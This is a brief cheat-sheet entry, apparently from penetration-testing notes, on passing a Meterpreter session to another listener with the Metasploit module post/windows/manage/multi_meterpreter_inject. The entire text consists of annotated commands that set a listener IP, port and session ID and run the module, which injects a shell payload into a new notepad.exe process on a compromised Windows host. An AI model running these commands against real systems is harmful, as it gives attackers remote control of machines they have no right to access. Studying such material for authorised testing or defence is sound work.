Meterpreter Pass a Shell
By default, this module will create a notepad.exe process and inject into it.
use post/windows/manage/multi_meterpreter_inject
--> Use module
set IPLIST <IP_ADDRESS>
--> Set target IP address to pass the shell to
set LPORT <PORT>
--> Set the target port
set SESSION <SESSION_ID>
--> Set the session ID to run this module against
exploit
--> Run the module
Last updated